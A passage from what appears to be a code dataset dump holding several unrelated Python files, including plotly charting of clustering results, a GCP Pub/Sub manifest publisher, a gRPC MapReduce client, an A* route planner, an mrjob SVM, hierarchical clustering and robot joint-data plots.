107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='Goodness Measures',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\t\n\tfig = Figure(data=data, layout=layout)\n\tname = 'cluster-measures'\n\tif postfix != None:\n\t\tname += postfix\n\tplot_url = py.plot(fig, filename=name)\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n \n# This is a plot for Goodness of Cluster measure using silhouette_avg\ndef generatePlotSilhouette(username, apiKey, clusterCountList, silhouetteAvgList, postfix):\n\ttls.set_credentials_file(username, apiKey)\n\ttrace = Bar(\n\t\tx=clusterCountList,\n\t\ty=silhouetteAvgList,\n\t\tname='Silhouette Average Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(0, 255, 0)'\n\t\t)\n\t)\n\tdata = Data([trace])\n\tlayout = Layout(\n\t\ttitle='Number of Clusters vs Silhouette Average Score',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Clusters',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='Silhouette Average Score',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tname = 'silhouette-average-score'\n\tif postfix != None:\n\t\tname += postfix\n\tplot_url = py.plot(fig, filename=name)\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n\ndef plotSilhouetteSamples(username, apiKey, fileToRead, postfix=None):\n\tevaluatedClusterResultsDict = json.loads(gzip.open(fileToRead, \"rb\").read().decode(\"utf8\"))\n#\tevaluatedClusterResultsDict = json.loads(open(fileToRead, 'r').read().decode('utf8'))\n\t\n\tclusterCountList = []\n\t\n\tsilhouetteAvgList = []\n\t\n\tfor clusterCount, clusterData in evaluatedClusterResultsDict.iteritems():\n\t\tif clusterCount != 'appVectors':\n\t\t\tclusterCountList.append(int(str(clusterCount).replace('Loop','')))\n\t\t\t#logging.debug('In', clusterCount, 'we have silhouette_avg of', clusterInfo['silhouette_avg']\n\t\t\tsilhouetteAvgList.append(clusterData['silhouette_avg'])\n\n\t#print silhouetteAvgList\n\tgeneratePlotSilhouette(username, apiKey, clusterCountList, silhouetteAvgList, postfix)\n\ndef plotGroundTruthResults(username, apiKey, fileToRead, postfix=None):\n\tevaluatedClusterResultsDict = json.loads(gzip.open(fileToRead, \"rb\").read().decode(\"utf8\"))\n#\tevaluatedClusterResultsDict = json.loads(open(fileToRead, 'r').read().decode('utf8'))\n\t\n\tclusterCountList = []\n\t\n\thomogeneityScoreList = []\n\tcompletenessScoreList = []\n\tadjustedRandScoreList = []\n\tadjustedMutualInfoScoreList = []\n\tvMeasureScoreList = []\n\tnormalizedMutualInfoScore = []\n\t\n\tfor clusterCount, clusterData in evaluatedClusterResultsDict.iteritems():\n\t\tif clusterCount != 'appVectors':\n\t\t\tclusterCountList.append(int(str(clusterCount).replace(\"Loop\",\"\")))\n\t\t\tclusterInfo = clusterData['clusterEvaluationResults']\n\t\t\tif \"adjusted_rand_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have adjusted_rand_score of\", clusterInfo[\"adjusted_rand_score\"]\n\t\t\t\tadjustedRandScoreList.append(float(clusterInfo[\"adjusted_rand_score\"]))\n\t\t\tif \"adjusted_mutual_info_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have adjusted_mutual_info_score of\", clusterInfo[\"adjusted_mutual_info_score\"]\n\t\t\t\tadjustedMutualInfoScoreList.append(float(clusterInfo[\"adjusted_mutual_info_score\"]))\n\t\t\tif \"homogeneity_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have homogeneity_score of\", clusterInfo[\"homogeneity_score\"]\n\t\t\t\thomogeneityScoreList.append(float(clusterInfo[\"homogeneity_score\"]))\n\t\t\tif \"completeness_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have completeness_score of\", clusterInfo[\"completeness_score\"]\n\t\t\t\tcompletenessScoreList.append(float(clusterInfo[\"completeness_score\"]))\n\t\t\tif \"v_measure_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have v_measure_score of\", clusterInfo[\"v_measure_score\"]\n\t\t\t\tvMeasureScoreList.append(float(clusterInfo[\"v_measure_score\"]))\n\t\t\tif \"normalized_mutual_info_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have v_measure_score of\", clusterInfo[\"v_measure_score\"]\n\t\t\t\tnormalizedMutualInfoScore.append(float(clusterInfo[\"normalized_mutual_info_score\"]))\n\n\t#print clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList\n\tgenerateGroundTruthResults(username, apiKey, clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList, normalizedMutualInfoScore, postfix)\n\ndef main(argv):\n\tif len(sys.argv) != 4:\n\t\tsys.stderr.write('Usage: python plotResults.py username apiKey resultsFile\\n')\n\t\tsys.exit(1)\n\n\tusername = sys.argv[1]\n\tapiKey = sys.argv[2]\n\tresultsFile = sys.argv[3]\n\n\tstartTime = time.time()\n\tgenerateAppPermissionsRequestedFrequencyHistogram(username, apiKey)\n\tgeneratePermissionsRequestedByAppFrequencyHistogram(username, apiKey)\n\tplotSilhouetteSamples(username, apiKey, resultsFile, postfix=None)\n\tplotGroundTruthResults(username, apiKey, resultsFile, postfix=None)\n\texecutionTime = str((time.time()-startTime)*1000)\n\tlogging.debug('Execution time was: '+executionTime+' ms')\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)","sub_path":"code/behaviorSystemCallAnalysis/plotResults.py","file_name":"plotResults.py","file_ext":"py","file_size_in_byte":11589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418751478","text":"import os\nimport base64\nimport binascii\nimport json\nfrom google.cloud import pubsub_v1\nimport blaise_dds\n\n\ndef createMsg(data):\n msg = {\n \"version\": 3,\n \"schemaVersion\": 1,\n \"files\": [],\n \"sensitivity\": \"High\",\n \"sourceName\": \"gcp_blaise_\" + os.environ[\"ENV\"],\n \"description\": \"\",\n \"dataset\": \"\",\n \"iterationL1\": \"\",\n \"iterationL2\": \"\",\n \"iterationL3\": \"\",\n \"iterationL4\": \"\",\n \"manifestCreated\": \"\",\n \"fullSizeMegabytes\": \"\",\n }\n\n files = {}\n filename = data[\"name\"] + \":\" + data[\"bucket\"]\n files[\"sizeBytes\"] = data[\"size\"]\n files[\"name\"] = filename\n decodehash = base64.b64decode(data[\"md5Hash\"])\n encodehash = binascii.hexlify(decodehash)\n files[\"md5sum\"] = str(\n encodehash, \"utf-8\"\n ) # Note GCP uses md5hash - however, MiNiFi needs it to be md5sum\n files[\"relativePath\"] = \".\\\\\"\n msg[\"files\"].append(files)\n fileExtn = data[\"name\"].split(\".\")[1].lower()\n fileType = data[\"name\"].split(\"_\")[0].lower()\n\n runPubSub = False\n\n if fileExtn == \"zip\" and fileType == \"mi\":\n msg[\n \"description\"\n ] = \"Management Information files uploaded to GCP bucket from Blaise5\"\n msg[\"dataset\"] = \"blaise_mi\"\n msg[\"iterationL1\"] = os.getenv(\"ON-PREM-SUBFOLDER\")\n msg[\"iterationL2\"] = \"\"\n msg[\"iterationL3\"] = \"\"\n msg[\"iterationL4\"] = \"\"\n elif fileExtn == \"zip\" and fileType == \"dd\":\n msg[\"description\"] = \"Data Delivery files uploaded to GCP bucket from Blaise5\"\n msg[\"dataset\"] = \"blaise_dde\"\n msg[\"iterationL1\"] = \"SYSTEMS\"\n msg[\"iterationL2\"] = os.getenv(\"ON-PREM-SUBFOLDER\")\n msg[\"iterationL3\"] = data[\"name\"][3:6].upper()\n msg[\"iterationL4\"] = data[\"name\"][3:11].upper()\n else:\n print(\n \"File extension {} not found or file type {} is invalid\".format(\n fileExtn, fileType\n )\n )\n return None\n\n msg[\"manifestCreated\"] = data[\"timeCreated\"]\n msg[\"fullSizeMegabytes\"] = \"{:.6f}\".format(int(data[\"size\"]) / 1000000)\n print(f\"Message created {msg}\")\n return msg\n\n\ndef publishMsg(data, context):\n project_id = os.getenv(\"PROJECT_ID\", None)\n topic_name = os.getenv(\"TOPIC_NAME\", None)\n dds_client = blaise_dds.Client(blaise_dds.Config.from_env())\n try:\n dds_client.update_state(data[\"name\"], \"in_nifi_bucket\")\n\n print(f\"Configuration: Project ID: {project_id}\")\n print(f\"Configuration: Topic Name: {topic_name}\")\n print(f\"Configuration: File name: {data['name']}\")\n print(f\"Configuration: Bucket Name: {data['bucket']}\")\n print(\n f\"Configuration: ON-PREM-SUBFOLDER: {os.getenv('ON-PREM-SUBFOLDER', None)}\"\n )\n\n if project_id is None:\n print(\"project_id not set, publish failed\")\n return\n\n msg = createMsg(data)\n print(f\"Message {msg}\")\n if msg is not None:\n client = pubsub_v1.PublisherClient()\n topic_path = client.topic_path(project_id, topic_name)\n msg_bytes = bytes(json.dumps(msg), encoding=\"utf-8\")\n client.publish(topic_path, data=msg_bytes)\n print(f\"Message published\")\n dds_client.update_state(data[\"name\"], \"nifi_notified\")\n\n except Exception as error:\n dds_client.update_state(data[\"name\"], \"errored\", repr(error))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562459272","text":"import logging\nimport sys\nimport argparse\n\nimport grpc\n\nimport mapreduce_pb2\nimport mapreduce_pb2_grpc\n\n## === USER INPUT ====\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '--p2inputs',\n default='inputs',\n help='provide an string path to input .txt files'\n)\nparser.add_argument(\n '--p2intermediate',\n default='outputs/intermediate',\n help='provide an string path where to intermediate output files'\n)\nparser.add_argument(\n '--p2outputs',\n default='outputs/out',\n help='provide an string path where to save the final output files'\n)\nparser.add_argument(\n '--M',\n default=4,\n help='how many buckets? (int)'\n)\nclinput = parser.parse_args()\n## ===================\n \ndef run():\n\n channel = grpc.insecure_channel('localhost:50051')\n stub = mapreduce_pb2_grpc.MapReduceStub(channel)\n \n # Map:\n print(\"=== Starting map.\")\n print(\"=== Map files:\")\n responses = stub.Map(mapreduce_pb2.MapRequest(\n input_path = clinput.p2inputs, \n output_path = clinput.p2intermediate, \n M = int(clinput.M)\n ))\n for response in responses:\n print(response.path)\n \n # Reduce:\n print(\"=== Map complete. Starting reduce. \")\n print(\"=== Reduce files:\")\n responses = stub.Reduce(mapreduce_pb2.ReduceRequest(\n input_path = clinput.p2intermediate, \n output_path = clinput.p2outputs\n ))\n for response in responses:\n print(response.path)\n \n # Terminate:\n print(\"=== Reduce complete. Final output files at: {}.\".format(clinput.p2outputs))\n print(\"=== Task complete. Servers and client will now exit.\")\n response = stub.Stop(mapreduce_pb2.StopRequest(shouldstop = True))\n sys.exit(0)\n \n\nif __name__ == '__main__':\n logging.basicConfig()\n run()","sub_path":"mapreduce_client.py","file_name":"mapreduce_client.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"11614699","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# https://en.wikipedia.org/wiki/A*_search_algorithm\n# http://www.geeksforgeeks.org/a-search-algorithm/\n# https://docs.python.org/2/library/heapq.html\n\nimport math\nimport heapq\n\n\ndef euclidean_distance(start, end):\n return math.hypot(start[0] - end[0], start[1] - end[1])\n\ndef heuristic_cost_estimate(start, end):\n return euclidean_distance(start, end)\n\ndef reconstruct_path(cameFrom, current):\n total_path = [current]\n while current in cameFrom:\n current = cameFrom[current] \n total_path.insert(0, current)\n return total_path\n\n\ndef shortest_path(M, start, goal):\n print('shortest path called') \n\n assert (start in M.intersections), \"Start is not defined in the map.\" \n assert (goal in M.intersections), \"Goal is not defined in the map.\" \n\n closedSet = set()\n openSet = set()\n pq = []\n cameFrom = {}\n gScore = {start: 0.0}\n fScore = {start: heuristic_cost_estimate(M.intersections[start], M.intersections[goal])}\n shortest_path_found = False\n\n heapq.heappush(pq, (fScore[start], start))\n openSet.add(start)\n\n while openSet:\n current = heapq.heappop(pq)[1] \n if current == goal:\n shortest_path_found = True\n break\n\n openSet.remove(current) \n closedSet.add(current)\n\n for neighbor in M.roads[current]:\n if neighbor in closedSet:\n continue\n \n tentative_gScore = gScore[current] + euclidean_distance(M.intersections[current], M.intersections[neighbor]) \n if neighbor in gScore and tentative_gScore >= gScore[neighbor]:\n continue\n \n cameFrom[neighbor] = current\n gScore[neighbor] = tentative_gScore\n fScore[neighbor] = gScore[neighbor] + heuristic_cost_estimate(M.intersections[neighbor], M.intersections[goal]) \n \n if neighbor not in openSet:\n heapq.heappush(pq, (fScore[neighbor], neighbor))\n openSet.add(neighbor)\n \n\n if not shortest_path_found:\n raise ValueError('No path found.')\n\n return reconstruct_path(cameFrom, goal)\n","sub_path":"Project 3 - Implement Route Planner/student_code.py","file_name":"student_code.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"51628331","text":"'''\nInput: a List of integers\nReturns: a List of integers\n'''\n\n# This solution takes O(1) space as requested by directions, but runs in O(n^2) time\n# def moving_zeroes(arr):\n# # We can look at this problem as if we are moving non-zeros to the left\n# # But that would mean insertions at the beginning of the array\n# # Or we could look at it as moving zeros to the end of the array\n# # The challenge asks to do it in one pass with O(1) space\n\n# # Iterate through numbers\n# # If number is zero, move to end of array\n# # If number is not zero, simply increment the index\n# # We want to be looping through numbers minus number of zeros moved\n# # Let's use a while loop for our iteration so that we can modify the end\n\n# i = 0\n# end = len(arr)\n\n# while i < end:\n# if arr[i] == 0:\n# arr.append(arr.pop(i))\n# end -= 1\n# else:\n# i += 1\n\n# return arr\n\n# # This solution takes O(n) space but runs in O(n) time\n# def moving_zeroes(arr):\n# result = [0] * len(arr)\n\n# i = 0\n# j = len(arr) - 1\n\n# for num in arr:\n# if num != 0:\n# result[i] = num\n# i += 1\n# else:\n# result[j] = num\n# j -= 1\n \n# return result\n\n# This solution takes O(1) space and runs in O(n) time\ndef moving_zeroes(arr):\n # Let't try just swapping positions at either end,\n # until our pointers meet in the middle\n\n i = 0\n j = len(arr) - 1\n\n while i < j:\n # Check for zero at i\n if arr[i] == 0:\n # while i is less than j\n # If j isn't zero, swap, move pointers, and break\n # Otherwise, move j down\n while i < j:\n if arr[j] != 0:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n j -= 1\n break\n else:\n j -= 1\n else:\n # if not 0, increment i\n i += 1\n\n return arr\n\n\nif __name__ == '__main__':\n # Use the main function here to test out your implementation\n arr = [0, 3, 1, 0, -2]\n\n print(f\"The resulting of moving_zeroes is: {moving_zeroes(arr)}\")\n\n\nimport time\n\nzeroes = [0] * 1000000\n\nstart_time = time.time()\n\nmoving_zeroes(zeroes)\n\nend_time = time.time()\n\nprint(f\"Moving zeroes took {end_time - start_time}\")","sub_path":"moving_zeroes/moving_zeroes.py","file_name":"moving_zeroes.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"82579847","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport pickle\nimport numpy as np\n\nfrom mrjob.job import MRJob\n\nclass MRsvm(MRJob):\n DEFAULT_INPUT_PROTOCAL = 'json_value'\n\n def __init__(self, *args, **kwargs):\n super(MRsvm, self).__init__(*args, **kwargs)\n self.data = pickle.load(open('/home/cavin/Code/BookPractice/Python/MachineLearninginAction/ch15/svmDat27'))\n self.w = 0\n self.eta = 0.69\n self.dataList = []\n self.k = self.options.batchsize\n self.numMappers = 1\n self.t = 1\n\n def configure_options(self):\n super(MRsvm, self).configure_options()\n self.add_passthrough_option('--iterations', dest='iterations', default=2, type='int', \n help='T: number of iterations to run')\n self.add_passthrough_option('--batchsize', dest='batchsize', default=100, type='int',\n help='k: number of data points in a batch')\n \n def steps(self):\n return ([self.mr(mapper=self.map, mapper_final=self.map_fin, reducer=self.reduce)] * self.options.iterations)\n\n def map(self, mapperId, inVals):\n if False:\n yield\n if inVals[0] == 'w':\n self.w = inVals[1]\n elif inVals[0] == 'x':\n self.dataList.append(inVals[1])\n elif inVals[0] == 't':\n slef.t = inVals[1]\n\n def map_fin(self):\n labels = self.data[:, -1]\n X = self.data[:, 0:-1]\n if self.w == 0:\n self.w = [0.001] * np.shape(X)[1]\n for index in self.dataList:\n p = np.mat(self.w) * X[index, :].T\n if labels[index] * p < 1.0:\n yield (1, ['u', index])\n yield (1, ['w', self.w])\n yield (1, ['t', self.t])\n\n def reduce(self, _, packedVals):\n for valArr in packedVals:\n if valArr[0] == 'u':\n self.dataList.append(valArr[1])\n elif valArr[0] == 'w':\n self.w = valArr[1]\n elif valArr[0] == 't':\n self.t = valArr[1]\n labels = self.data[:, -1]\n X = self.data[:, 0:-1]\n wMat = np.mat(self.w)\n wDelta = np.mat(np.zeros(len(self.w)))\n for index in self.dataList:\n wDelta += float(labels[index]) * X[index, :]\n eta = 1.0 / (2.0 * self.t)\n wMat = (1.0 - 1.0 / self.t) * wMat + (eta / self.k) * wDelta\n for mapperNum in range(1, self.numMappers+1):\n yield (mapperNum, ['w', wMat.tolist()[0]])\n if self.t < self.options.iterations:\n yield (mapperNum, ['t', self.t + 1])\n for j in range(self.k / self.numMappers):\n yield (mapperNum, ['x', random.randint(np.shape(self.data)[0])])\n\nif __name__ == '__main__':\n MRsvm.run()\n","sub_path":"MachineLearninginAction/ch15/mrSVM.py","file_name":"mrSVM.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"619269816","text":"from meetup_data import attendees_locations_tuples\nfrom matplotlib import pyplot\nfrom k_means import vector_mean\n\ndef distance(vector_a, vector_b):\n sum_of_squared_component_diffs = sum([\n (component_a - component_b) ** 2\n for component_a, component_b\n in zip(vector_a, vector_b)\n ])\n return sum_of_squared_component_diffs ** (1/2)\n\n\n# represent leaves as single tuples\n# non-leaf nodes are represented as (merge_order, leaf_list)\n\ndef is_leaf(cluster):\n return len(cluster) == 1\n\ndef get_children(cluster):\n if is_leaf(cluster):\n raise TypeError('a leaf cluster has no children')\n else:\n return cluster[1]\n \ndef get_values(cluster):\n if is_leaf(cluster):\n return cluster\n else:\n return [\n value\n for child in get_children(cluster)\n for value in get_values(child)\n ]\n\ndef cluster_distance(cluster1, cluster2, distance_agg=max):\n return distance_agg([\n distance(input_1, input_2)\n for input_1 in get_values(cluster1)\n for input_2 in get_values(cluster2)\n ])\n\ndef get_merge_order(cluster):\n if is_leaf(cluster):\n return float('inf')\n else:\n return cluster[0]\n\ndef bottom_up_cluster(inputs, distance_agg=max):\n clusters = [ (input,) for input in inputs ]\n\n while len(clusters) > 1:\n cluster_1, cluster_2 = min(\n [\n (cluster_1, cluster_2)\n for index_1, cluster_1 in enumerate(clusters) \n for cluster_2 in clusters[:index_1]\n ],\n\n key=\n lambda cluster_pair: cluster_distance(cluster_pair[0], cluster_pair[1], distance_agg)\n )\n\n clusters = [\n cluster\n for cluster in clusters\n if cluster != cluster_1 and cluster != cluster_2\n ]\n\n merged_cluster = (len(clusters), [cluster_1, cluster_2])\n\n clusters.append(merged_cluster)\n\n return clusters[0]\n\ndef generate_clusters(base_cluster, num_clusters):\n clusters = [ base_cluster ]\n\n while len(clusters) < num_clusters:\n next_cluster = min(clusters, key=get_merge_order)\n clusters = [\n cluster \n for cluster in clusters\n if cluster != next_cluster\n ]\n clusters.extend(get_children(next_cluster))\n \n return clusters\n\n\nbase_cluster = bottom_up_cluster(attendees_locations_tuples)\n# print(base_cluster)\n\nthree_clusters = [\n get_values(cluster)\n for cluster\n in generate_clusters(base_cluster, 3)\n]\n\nprint('three clusters = %s' % three_clusters)\n\nplot_zip_parameters = zip(\n [1, 2, 3],\n three_clusters,\n ['D', 'o', '*'],\n ['r', 'g', 'b'],\n)\n\nfor index, cluster, marker, color in plot_zip_parameters:\n xs, ys = zip(*cluster)\n pyplot.scatter(xs, ys, color=color, marker=marker)\n x, y = vector_mean(cluster)\n pyplot.plot(x, y, marker='$' + str(index) + '$', color='black')\n\npyplot.title('User Locations-3 Bottom-Up Clusters, Min')\npyplot.xlabel('blocks East of city center')\npyplot.ylabel('blocks North of city center')\npyplot.show()\n","sub_path":"20-exercises/bottoms_up_clustering.py","file_name":"bottoms_up_clustering.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86522151","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport datetime\nimport numpy as np\n\n# Use this file to read in your data and prepare the plotly visualizations. The path to the data files are in\n# `data/robot_data.csv`\n\ndef prepare_data(filepath):\n \"\"\"Returns cleaned and augmented data for visualization\n \n Args: \n filepath: filepath to the dataset\n \n Returns: \n df: dataframe of cleaned and augmented data\n \n \"\"\"\n df = pd.read_csv(filepath)\n \n # convert datetimes column to datetime datatype\n df['datetimes'] = df['datetimes'].map(lambda x: datetime.datetime.strptime(x, \"%d%m%y-%H:%M:%S.%f\"))\n \n # create column of interval times\n intervals = np.zeros(df.shape[0])\n \n for i, dt in enumerate(df['datetimes']):\n if i == 0:\n prev_dt = dt\n continue\n\n intervals[i] = (intervals[i-1] + ((dt - prev_dt).microseconds / 1e6))\n\n prev_dt = dt\n \n # convert to series\n intervals = pd.Series(intervals)\n\n # create new column\n df.insert(0, \"time\", intervals) \n \n # change to categorical feature\n def change_to_category(x):\n if x == 1:\n x = 'normal'\n elif x == 3:\n x = 'protective_stop'\n elif x == 8:\n x = 'violation'\n elif x == 9:\n x = 'fault'\n else:\n x = 'error'\n\n return x\n \n df['safety_mode'] = df['safety_mode'].apply(change_to_category)\n \n \n # get accelerations\n base_acc = np.zeros(df.shape[0])\n shoulder_acc = np.zeros(df.shape[0])\n elbow_acc = np.zeros(df.shape[0])\n wrist1_acc = np.zeros(df.shape[0])\n wrist2_acc = np.zeros(df.shape[0])\n wrist3_acc = np.zeros(df.shape[0])\n\n def get_acceleration(array, joint):\n for i, vel in enumerate(df[f'actual_qd_{joint}']):\n if i == 0:\n prev_vel = vel\n continue\n\n d_time = df['time'][i] - df['time'][i-1]\n \n if d_time == 0.0:\n d_time = 0.008\n \n d_vel = vel - prev_vel\n\n acc = d_vel / d_time\n\n array[i] = acc\n\n prev_vel = vel\n\n return array\n\n base_acc_series = pd.Series(get_acceleration(base_acc, 0))\n shoulder_acc_series = pd.Series(get_acceleration(shoulder_acc, 1))\n elbow_acc_series = pd.Series(get_acceleration(elbow_acc, 2))\n wrist1_acc_series = pd.Series(get_acceleration(wrist1_acc, 3))\n wrist2_acc_series = pd.Series(get_acceleration(wrist2_acc, 4))\n wrist3_acc_series = pd.Series(get_acceleration(wrist3_acc, 5))\n \n df.insert(13, 'actual_qdd_0', base_acc_series)\n df.insert(14, 'actual_qdd_1', shoulder_acc_series)\n df.insert(15, 'actual_qdd_2', elbow_acc_series)\n df.insert(16, 'actual_qdd_3', wrist1_acc_series)\n df.insert(17, 'actual_qdd_4', wrist2_acc_series)\n df.insert(18, 'actual_qdd_5', wrist3_acc_series)\n \n # drop unwanted columns, also drop datetimes\n df.drop(['datetimes', 'robot_mode'], axis=1, inplace=True)\n \n # drop duplicated data\n df = df.drop_duplicates()\n \n return df\n\n\n\ndef return_figures(df):\n \"\"\"Creates four plotly visualizations\n\n Args:\n df: dataframe of cleaned and augmented data\n\n Returns:\n list (dict): list containing the four plotly visualizations\n\n \"\"\"\n \n time = df['time'].tolist()\n\n # first chart plots joint currents vs time as a line chart\n \n graph_one = []\n \n \n graph_one.append([\n \n go.Scatter(\n x = time,\n y = df['actual_current_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_current_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_current_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_current_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_current_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_current_5'].tolist(),\n mode = 'lines',\n name = 'Twist')\n \n \n ])\n\n layout_one = dict(title = 'Graph of Joint Currents vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Currents (A)'),\n )\n \n # second chart plots joint voltages vs time as a line chart\n graph_two = []\n \n graph_two.append([\n \n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_5'].tolist(),\n mode = 'lines',\n name = 'Twist')\n \n \n ])\n\n layout_two = dict(title = 'Graph of Joint Voltages vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Voltages (A)'),\n )\n \n # third chart plots joint temperatures vs time as a line chart\n graph_three = []\n \n graph_three.append([\n \n go.Scatter(\n x = time,\n y = df['joint_temperatures_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_5'].tolist(),\n mode = 'lines',\n name = 'Twist') \n ])\n\n layout_three = dict(title = 'Graph of Joint Temperatures vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Temperatures (degC)'),\n )\n \n # fourth chart plots joint speeds vs time as a line chart\n graph_four = []\n \n graph_four.append([\n \n go.Scatter(\n x = time,\n y = df['actual_qd_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_qd_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_qd_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_qd_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_qd_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_qd_5'].tolist(),\n mode = 'lines',\n name = 'Twist') \n ])\n\n layout_four = dict(title = 'Graph of Joint Velocities vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Velocities(rad/s)'),\n )\n \n # fifth chart plots joint accelerations vs time as a line chart\n graph_five = []\n \n graph_five.append([\n \n go.Scatter(\n x = time,\n y = df['actual_qdd_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_5'].tolist(),\n mode = 